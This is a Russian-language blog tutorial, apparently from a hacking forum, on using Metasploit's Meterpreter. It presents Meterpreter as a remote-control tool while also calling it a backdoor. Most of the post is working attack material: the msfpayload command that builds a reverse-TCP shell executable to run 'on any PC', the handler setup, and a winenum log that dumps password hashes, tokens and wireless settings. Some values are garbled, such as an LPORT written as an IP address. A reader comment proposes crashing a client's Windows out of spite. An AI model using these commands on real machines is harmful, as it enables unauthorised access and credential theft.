vendredi 26 mars 2010

Meterpreter, как средство удалённого управления

Настало время рассказать вам об очень интересных возможностях метасплойта и о том,почему же я ставлю его на первое место нетолько как какой-нибудь бэкдор или набор эксплойтов, но и как полноценную программу удалённого управления.


Небольшое вступление

Когда среди множества начинок для эксплойтов,я заметил загадочный meterpreter, посмотрев его описания и команды,я не придал большое значение этой начинке/шеллу, и как оказалось очень зря. Веть описанные в хэлпе команды - это всеголишь малая часть его возможностей.Итак, что жа такое meterpreter и зачем он нужен?


Использования скриптов meterpreter

Для начала откроем консоль метасплойта и скомандуем show. Среди начинок (payloads) вы можете найти следующие строки:


windows/meterpreter/bind_ipv6_tcp Windows Meterpreter, Bind TCP Stager (IPv6)
windows/meterpreter/bind_nonx_tcp Windows Meterpreter, Bind TCP Stager (No NX Support)
windows/meterpreter/bind_tcp Windows Meterpreter, Bind TCP Stager
windows/meterpreter/find_tag Windows Meterpreter, Find Tag Ordinal Stager
windows/meterpreter/reverse_http Windows Meterpreter, PassiveX Reverse HTTP Tunneling Stager
windows/meterpreter/reverse_ipv6_tcp Windows Meterpreter, Reverse TCP Stager (IPv6)
windows/meterpreter/reverse_nonx_tcp Windows Meterpreter, Reverse TCP Stager (No NX Support)
windows/meterpreter/reverse_ord_tcp Windows Meterpreter, Reverse Ordinal TCP Stager
windows/meterpreter/reverse_tcp Windows Meterpreter, Reverse TCP Stager

Чтобы не нагружать ваш мозг лишней информацией, обойдусь без описания, скажу лишь что нас больше всего интересует следующая начинка:

Код:
windows/meterpreter/reverse_tcp
Теперь,чтобы показать возможности начинки, создадим небольшой exe , который и будет обеспечивать нас реверс конектом и шелом meterpreter.Для этого, откроем CMD shell и напишем там:

Цитата:
cd %APPDATA%
ruby msf3-dev/msfpayload windows/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT=4.4.4.4 X > metershell.exe
где 0.0.0.0 - ip адрес вашего пк.

Готовый файл будет лежать в папке C:\Documents and Settings\USERNAME\Application Data

Отмечу что возможно прикручивание meterpreter к любому эксплойту,т.е вам необязательно сохранять начинку в файл,чтоб воспользоваться ей.

В нашем примере далее необходимо прописать в консоли метасплойта следующее:

Код:
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
exploit
Всё!Следующим шагом будет запуск созданного exe на любом пк.

Теперь вы получили командную консоль meterpreter.Скажу сразу, что можно скомандовать help и посмотреть какие команды приготовил нам хелп, на первый взгляд их тут много, но при изучении оказывается что полезных на самом деле мало...Выделю то,что по моему мнению заслуживает внимания

Core Commands
=============

Command Description
------- -----------
? Help menu
background Backgrounds the current session
channel Displays information about active channels
close Closes a channel
exit Terminate the meterpreter session
help Help menu
interact Interacts with a channel
irb Drop into irb scripting mode
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
run Executes a meterpreter script
use Load a one or more meterpreter extensions
write Writes data to a channel


Stdapi: File system Commands
============================

Command Description
------- -----------
download Download a file or directory
upload Upload a file or directory


Stdapi: Networking Commands
===========================

Command Description
------- -----------

portfwd Forward a local port to a remote service

Stdapi: System Commands
=======================

Command Description
------- -----------
execute Execute a command
..................................
sysinfo Gets information about the remote system, such as OS

Я думаю нет смысла пояснять что это за команды и что они делают.Теперь настало время самого интересно.А именно использования скриптов, которые лежат в папке meterpreter, но никто ничего о них не знает)).Обо всём попорядку.


Код:
meterpreter> run winenum
отображение выполнение скрипта вы увидите в консоли. Не буду описывать что он делает, приведу лог с консоли - вы всё поймёте по командам.Отмечу что результат работы скрипта сохранается в папке C:\Documents and Settings\USERNAME\Application Data\.msf3\logs\winenum\ , в текстовом файле txt, а также создаётся архив с импортированной веткой реестра.Сколько же полезной информации об удалённом пк найдёте вы в этом txt файле!!!!!Советую в первую очередь,после удачного соеденения выполнять этот скрипт - он покажет вам максимальное колличество информации, на сбор которой вручную,у вас бы ушло много времени.

Running Windows Local Enumerion Meterpreter Script
New session on 0.0.0.0.0:1853...
Saving report to C:\Documents and Settings\Admin\Application Data/.msf3/logs/winenum/0.0.0.0.0_20090406.3459-44806/0.0.0.0.0_20090406.3459-44806.txt
Checking if ???? is a Virtual Machine ........
Rex::Post::Meterpreter::RequestError stdapi_registry_create_key: Operation failed: 1021
Running Command List ...
running command cmd.exe /c set
running command arp -a
running command ipconfig /all
running command ipconfig /displaydns
running command route print
running command net view
running command netstat -nao
running command netstat -vb
Error Running Command netstat -vb: Rex::TimeoutError Operation timed out.
running command netstat -ns
running command net accounts
running command net accounts /domain
running command net session
running command net share
running command net group
running command net user
running command net localgroup
running command net localgroup administrators
running command net group administrators
running command net view /domain
running command netsh firewall show config
running command tasklist /svc
running command tasklist /m
Running WMIC Commands ....
running command wmic computersystem list brief
running command wmic useraccount list
running command wmic group list
running command wmic service list brief
running command wmic volume list brief
running command wmic logicaldisk get description,filesystem,name,size
running command wmic netlogin get name,lastlogon,badpasswordcount
running command wmic netclient list brief
running command wmic netuse get name,username,connectiontype,localname
running command wmic share get name,path
running command wmic nteventlog get path,filename,writeable
running command wmic process list brief
running command wmic startup list full
running command wmic rdtoggle list
running command wmic product get name,version
running command wmic qfe
Extracting software list from registry
Finished Extraction of software list from registry
Dumping and Downloading the Registry entries for Configured Wireless Networks
Exporting HKLM\Software\Microsoft\WZCSVC\Parameters\Interfaces
Compressing key into cab file for faster download
Downloading wlan_20090406.3459-44806.cab to -> C:\Documents and Settings\Admin\Application Data/.msf3/logs/winenum/0.0.0.0._20090406.3459-44806/wlan_20090406.3459-44806.cab
Deleting left over files
Dumping password hashes...
Hashes Dumped
Getting Tokens...
All tokens have been processed
Done!
----------------------------------------------------------------------------------------

Ну чтож,перейдём к следующему скрипту, который называется:

Windows Remote Desktop Configuration Meterpreter script

Угадайте,что он делает?Сейчас покажу.


Так,я думаю вы начинаете понимать достоинства meterpreter)

На этом скрипте на сегодня я закончу, хотя в папке meterpreter осталось ещё много интересного,он об этом в другой раз).

EbriPsy co stopxaker.ru

2 commentaires:

  1. Можно запороть винду с помощью meterprete Ну вдруг вам насолил какой-нибудь неадекватный клиент https://codeby.net/media/gde-moi-dengi-chuvak-ili-krashim-windows-10.164/

    RépondreSupprimer